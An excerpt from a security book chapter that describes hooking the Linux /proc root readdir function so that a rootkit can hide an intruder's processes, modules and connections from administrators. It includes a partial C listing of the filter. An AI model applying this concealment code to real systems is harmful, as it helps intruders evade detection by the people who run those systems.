Trapping Requests to the File System | Shellcoders Programming Uncovered (Uncovered series)

The kernel exports the proc_root variable (root inode) of the virtual file system traditionally mounted to the /proc directory. If desired, the hacker can install a custom filter over it, which would conceal hacker's processes from the administrator. In contrast to system calls, trapping of the proc_root variable is not sensitive to the kernel version, which certainly is an advantage.

The simplest trapper can appear as shown in Listing 13.8. More detailed information on this topic can be found in the " Sub proc_root Quando Sumus " article published in issue 58 of the Phrack e-zine.

Listing 13.8: New filter for the proc_root file system

 // Global pointer to the original filldir function. filldir_t real_filldir; static int new_filldir_root (void* __buf, const char* name, int namlen, off_t offset, ino_t ino) {         // Analyze every file name in the directory.         // If this is the name of the module, process, or network         // connection that must be disguised, return zero; otherwise,         // pass control to the original filldir function.         if (isHidden (name)) return 0;         return real_filldir (__buf, name, namlen, offset, ino); } // New readdir function int new_readdir_root (struct file *a, void *b, filldir_t c) {         // Initialize the pointer to the original filldir function.         // In general, it is not necessary to do this every time;         // however, this is the simplest approach.         real_filldir = c;         return old_readdir_root (a, b, new_filldir_root); } // Install the custom filter. proc_root.FILE_OPS->readdir =new_readdir_root;